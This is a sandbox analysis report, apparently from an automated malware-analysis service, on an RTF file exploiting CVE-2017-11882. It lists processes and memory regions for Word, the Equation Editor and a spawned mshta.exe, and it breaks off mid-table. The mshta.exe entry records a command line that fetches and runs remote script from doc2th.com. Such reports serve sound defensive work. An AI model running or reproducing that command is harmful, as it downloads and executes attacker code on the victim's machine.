RTF Document Takes Advantage of CVE-2017-11882 Vulnerability

Monitored Processes

Behavior Information - Grouped by Category

Process #1: winword.exe'

Information	Value
ID	#1
File Name	c:\program files\microsoft office\office15\winword.exe
Command Line	"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE"
Initial Working Directory	C:\Users\BGC6u8Oy yXGxkR\Desktop\
Monitor	Start Time: 00:00:13, Reason: Analysis Target
Unmonitor	End Time: 00:02:19, Reason: Terminated by Timeout
Monitor Duration	00:02:06
Remarks	No high level activity detected in monitored regions

OS Process Information

Information	Value
PID	0x95c
Parent PID	0x610 (c:\windows\explorer.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	F71GWAT\BGC6u8Oy yXGxkR
Groups	F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000f46e (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 998 0x 994 0x 990 0x 98C 0x 988 0x 984 0x 978 0x 974 0x 970 0x 96C 0x 968 0x 960 0x A84 0x A8C 0x AA0

Region

Name	Start VA	End VA	Type	Permissions	Actions
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000040000	0x00040000	0x00043fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000050000	0x00050000	0x00050fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000060000	0x00060000	0x00061fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000070000	0x00070000	0x0016ffff	Private Memory	Readable, Writable	Region Actions
locale.nls	0x00170000	0x001d6fff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000001e0000	0x001e0000	0x001e1fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000001f0000	0x001f0000	0x001f0fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000200000	0x00200000	0x002fffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000300000	0x00300000	0x003c7fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000003d0000	0x003d0000	0x003d0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000003e0000	0x003e0000	0x003effff	Private Memory	Readable, Writable	Region Actions
private_0x00000000003f0000	0x003f0000	0x00420fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000430000	0x00430000	0x0043ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000440000	0x00440000	0x00441fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000450000	0x00450000	0x00459fff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x0000000000460000	0x00460000	0x0046ffff	Private Memory	-	Region Actions
private_0x0000000000470000	0x00470000	0x004affff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000004b0000	0x004b0000	0x004b6fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000004c0000	0x004c0000	0x004cffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000004d0000	0x004d0000	0x004d1fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000004f0000	0x004f0000	0x004fffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000500000	0x00500000	0x00600fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000610000	0x00610000	0x006eefff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000006f0000	0x006f0000	0x006f1fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000700000	0x00700000	0x00700fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000700000	0x00700000	0x00703fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000720000	0x00720000	0x00720fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000730000	0x00730000	0x0074efff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000730000	0x00730000	0x00760fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000740000	0x00740000	0x00740fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000750000	0x00750000	0x0076efff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000760000	0x00760000	0x00760fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000770000	0x00770000	0x0078ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000790000	0x00790000	0x0088ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000890000	0x00890000	0x00890fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000008a0000	0x008a0000	0x008a0fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000008b0000	0x008b0000	0x008b0fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000008c0000	0x008c0000	0x008c3fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000008d0000	0x008d0000	0x009cffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000009d0000	0x009d0000	0x00dc2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000dd0000	0x00dd0000	0x00ecffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000ee0000	0x00ee0000	0x00ee0fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000ef0000	0x00ef0000	0x00f0efff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000f00000	0x00f00000	0x00f00fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000f10000	0x00f10000	0x00f2efff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000f20000	0x00f20000	0x00f20fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000f40000	0x00f40000	0x00f40fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000f50000	0x00f50000	0x00f50fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000f60000	0x00f60000	0x00f61fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000f70000	0x00f70000	0x00f70fff	Pagefile Backed Memory	Readable	Region Actions
winword.exe	0x00f80000	0x01156fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000001160000	0x01160000	0x01d5ffff	Pagefile Backed Memory	Readable	Region Actions
sortdefault.nls	0x01d60000	0x0202efff	Memory Mapped File	Readable	Region Actions
private_0x0000000002030000	0x02030000	0x020affff	Private Memory	Readable, Writable	Region Actions
private_0x00000000020b0000	0x020b0000	0x020effff	Private Memory	Readable, Writable, Executable	Region Actions
pagefile_0x00000000020f0000	0x020f0000	0x020f0fff	Pagefile Backed Memory	Readable	Region Actions
msxml6r.dll	0x02100000	0x02100fff	Memory Mapped File	Readable	Region Actions
private_0x0000000002110000	0x02110000	0x02110fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002110000	0x02110000	0x0212efff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000002130000	0x02130000	0x02130fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002130000	0x02130000	0x0214efff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000002150000	0x02150000	0x02150fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002170000	0x02170000	0x02170fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002180000	0x02180000	0x0219efff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000021b0000	0x021b0000	0x021b0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000021c0000	0x021c0000	0x021defff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000021e0000	0x021e0000	0x021e0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000021e0000	0x021e0000	0x021fdfff	Private Memory	Readable, Writable	Region Actions Download Dump
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db	0x02210000	0x02234fff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000002240000	0x02240000	0x02240fff	Pagefile Backed Memory	Readable, Writable	Region Actions
c_1255.nls	0x02250000	0x02260fff	Memory Mapped File	Readable	Region Actions
private_0x0000000002270000	0x02270000	0x0228dfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000002290000	0x02290000	0x0238ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000023b0000	0x023b0000	0x023cefff	Private Memory	Readable, Writable	Region Actions
private_0x00000000023d0000	0x023d0000	0x024cffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000024d0000	0x024d0000	0x024d0fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000024e0000	0x024e0000	0x024e1fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000024f0000	0x024f0000	0x025effff	Private Memory	Readable, Writable	Region Actions
segoeui.ttf	0x025f0000	0x0266efff	Memory Mapped File	Readable	Region Actions
private_0x0000000002670000	0x02670000	0x02690fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000026a0000	0x026a0000	0x026dffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000026e0000	0x026e0000	0x02adffff	Pagefile Backed Memory	Readable	Region Actions
staticcache.dat	0x02ae0000	0x0340ffff	Memory Mapped File	Readable	Region Actions
private_0x0000000003410000	0x03410000	0x0350ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003510000	0x03510000	0x03510fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000003530000	0x03530000	0x0356ffff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x0000000003570000	0x03570000	0x03571fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000003580000	0x03580000	0x03580fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000003590000	0x03590000	0x03591fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000035b0000	0x035b0000	0x035b1fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000035d0000	0x035d0000	0x035dffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000035e0000	0x035e0000	0x036dffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000036e0000	0x036e0000	0x036e1fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000003700000	0x03700000	0x03701fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000003740000	0x03740000	0x0374ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003790000	0x03790000	0x0379ffff	Private Memory	Readable, Writable	Region Actions
seguisb.ttf	0x037a0000	0x03803fff	Memory Mapped File	Readable	Region Actions
private_0x0000000003850000	0x03850000	0x0394ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003990000	0x03990000	0x0399ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000039a0000	0x039a0000	0x0419ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000041b0000	0x041b0000	0x042affff	Private Memory	Readable, Writable	Region Actions
kernelbase.dll.mui	0x042b0000	0x0436ffff	Memory Mapped File	Readable, Writable	Region Actions
private_0x00000000043d0000	0x043d0000	0x044cffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004540000	0x04540000	0x0463ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004690000	0x04690000	0x0478ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000004790000	0x04790000	0x04b8ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000004cc0000	0x04cc0000	0x04cfffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004e70000	0x04e70000	0x04eaffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000050a0000	0x050a0000	0x050dffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000050e0000	0x050e0000	0x054dffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000054e0000	0x054e0000	0x056dffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000056e0000	0x056e0000	0x05adffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000005ae0000	0x05ae0000	0x062dffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000062e0000	0x062e0000	0x066e0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000066f0000	0x066f0000	0x06af0fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000006b00000	0x06b00000	0x06f00fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000006f10000	0x06f10000	0x0710ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000007110000	0x07110000	0x075cffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000007230000	0x07230000	0x0732ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000007490000	0x07490000	0x0758ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000075d0000	0x075d0000	0x079cffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000079d0000	0x079d0000	0x081cffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000081d0000	0x081d0000	0x08681fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000009460000	0x09460000	0x0946ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000036620000	0x36620000	0x3662ffff	Private Memory	Readable, Writable, Executable	Region Actions
riched20.dll	0x63a10000	0x63b9dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
adal.dll	0x63ba0000	0x63c54fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscoreei.dll	0x63c60000	0x63cd9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dwrite.dll	0x63db0000	0x63eb9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
d3d10warp.dll	0x63ec0000	0x63febfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msores.dll	0x63ff0000	0x68cdafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mso.dll	0x68ce0000	0x6a5c3fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wwlib.dll	0x6a5d0000	0x6ba8bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
d3d11.dll	0x6baf0000	0x6bb72fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msptls.dll	0x6bb80000	0x6bc95fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msointl.dll	0x6bca0000	0x6c010fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wwintl.dll	0x6c020000	0x6c0dffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
d2d1.dll	0x6c0e0000	0x6c199fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oart.dll	0x6c1a0000	0x6cf47fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscoree.dll	0x6e980000	0x6e9c9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winspool.drv	0x6eed0000	0x6ef20fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
osppc.dll	0x6f220000	0x6f24cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msohev.dll	0x6f2f0000	0x6f304fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msxml6.dll	0x6fc30000	0x6fd87fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
office.odf	0x707d0000	0x70ccffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msi.dll	0x70cd0000	0x70f0ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcp100.dll	0x70f40000	0x70fa8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcr100.dll	0x70fb0000	0x7106efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dxgi.dll	0x713e0000	0x71462fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
d3d10_1core.dll	0x71470000	0x714a9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
d3d10_1.dll	0x714b0000	0x714dbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
webio.dll	0x716a0000	0x716eefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winhttp.dll	0x716f0000	0x71747fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msimg32.dll	0x71b10000	0x71b14fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntmarta.dll	0x737f0000	0x73810fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wtsapi32.dll	0x73a80000	0x73a8cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
windowscodecs.dll	0x73aa0000	0x73b9afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dwmapi.dll	0x73bd0000	0x73be2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdiplus.dll	0x73d70000	0x73efffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
uxtheme.dll	0x73f00000	0x73f3ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
propsys.dll	0x73f40000	0x74034fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
comctl32.dll	0x74080000	0x7421dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
version.dll	0x745f0000	0x745f8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rsaenh.dll	0x74910000	0x7494afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptsp.dll	0x74b70000	0x74b85fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
secur32.dll	0x74fb0000	0x74fb7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x74fd0000	0x74feafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x74ff0000	0x74ffbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winsta.dll	0x75060000	0x75088fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrtremote.dll	0x75090000	0x7509dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
profapi.dll	0x750a0000	0x750aafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x000000007ffdc000	0x7ffdc000	0x7ffdcfff	Private Memory	Readable, Writable	Region Actions Download Dump
For performance reasons, the remaining 110 entries are omitted. The remaining entries can be found in flog.txt.

Process #2: eqnedt32.exe'

Information	Value
ID	#2
File Name	c:\program files\common files\microsoft shared\equation\eqnedt32.exe
Command Line	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:00:22, Reason: RPC Server
Unmonitor	End Time: 00:02:19, Reason: Terminated by Timeout
Monitor Duration	00:01:57
Remarks	No high level activity detected in monitored regions

OS Process Information

Information	Value
PID	0x9f4
Parent PID	0x254 (c:\windows\system32\svchost.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	F71GWAT\BGC6u8Oy yXGxkR
Groups	F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000f46e (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 9F8 0x 9FC 0x A00 0x A04 0x A08

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000030000	0x00030000	0x0012ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000130000	0x00130000	0x00133fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000140000	0x00140000	0x00140fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x00150000	0x001b6fff	Memory Mapped File	Readable	Region Actions
private_0x00000000001c0000	0x001c0000	0x001c0fff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00000000001d0000	0x001d0000	0x001d0fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000001e0000	0x001e0000	0x001e6fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000001f0000	0x001f0000	0x001fffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000200000	0x00200000	0x0020ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000210000	0x00210000	0x0030ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000310000	0x00310000	0x003d7fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000003e0000	0x003e0000	0x003e1fff	Pagefile Backed Memory	Readable, Writable	Region Actions
eqnedt32.exe	0x00400000	0x0048dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000490000	0x00490000	0x00590fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000005a0000	0x005a0000	0x0119ffff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000011a0000	0x011a0000	0x0127efff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000012f0000	0x012f0000	0x012fffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001300000	0x01300000	0x016fffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001700000	0x01700000	0x017fffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001800000	0x01800000	0x0187ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000018f0000	0x018f0000	0x0192ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001930000	0x01930000	0x01a2ffff	Private Memory	Readable, Writable	Region Actions Download Dump
sortdefault.nls	0x01a30000	0x01cfefff	Memory Mapped File	Readable	Region Actions
private_0x0000000001d00000	0x01d00000	0x01dfffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001e00000	0x01e00000	0x01efffff	Private Memory	Readable, Writable	Region Actions Download Dump
kernelbase.dll.mui	0x01f00000	0x01fbffff	Memory Mapped File	Readable, Writable	Region Actions
private_0x00000000020c0000	0x020c0000	0x020fffff	Private Memory	Readable, Writable	Region Actions Download Dump
eeintl.dll	0x3de20000	0x3de2dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msi.dll	0x70cd0000	0x70f0ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
comctl32.dll	0x72290000	0x72313fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dwmapi.dll	0x73bd0000	0x73be2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
uxtheme.dll	0x73f00000	0x73f3ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rsaenh.dll	0x74910000	0x7494afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptsp.dll	0x74b70000	0x74b85fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x74ff0000	0x74ffbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrtremote.dll	0x75090000	0x7509dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x75260000	0x752a9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x75420000	0x754c0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x754d0000	0x7556ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x75580000	0x7560efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shell32.dll	0x75810000	0x76459fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x76460000	0x76469fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x76470000	0x7648efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x765d0000	0x7661dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x76620000	0x766e8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x766f0000	0x7684bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x76850000	0x768ecfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x768f0000	0x76908fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
clbcatq.dll	0x76ab0000	0x76b32fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x76b40000	0x76c0bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x76c10000	0x76ce3fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x76e40000	0x76eebfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x76f50000	0x7708bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x77120000	0x77176fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x77190000	0x77190fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007ffd3000	0x7ffd3000	0x7ffd3fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdb000	0x7ffdb000	0x7ffdbfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdc000	0x7ffdc000	0x7ffdcfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	Readable, Writable	Region Actions Download Dump

Process #3: mshta.exe

(Host: 491, Network: 0)

Information	Value
ID	#3
File Name	c:\windows\system32\mshta.exe
Command Line	mShta http://doc2th.com/tin/foobaz.txt &AAAAC
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:00:24, Reason: Child Process
Unmonitor	End Time: 00:02:19, Reason: Terminated by Timeout
Monitor Duration	00:01:55

OS Process Information

Information	Value
PID	0xa18
Parent PID	0x9f4 (c:\program files\common files\microsoft shared\equation\eqnedt32.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	F71GWAT\BGC6u8Oy yXGxkR
Groups	F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000f46e (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x A1C 0x A20 0x A24 0x A28 0x A2C 0x A30 0x A34 0x A38 0x A3C 0x A94 0x B38 0x B3C 0x B40

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x00026fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	Readable	Region Actions
imm32.dll	0x000c0000	0x000dcfff	Memory Mapped File	Readable	Region Actions
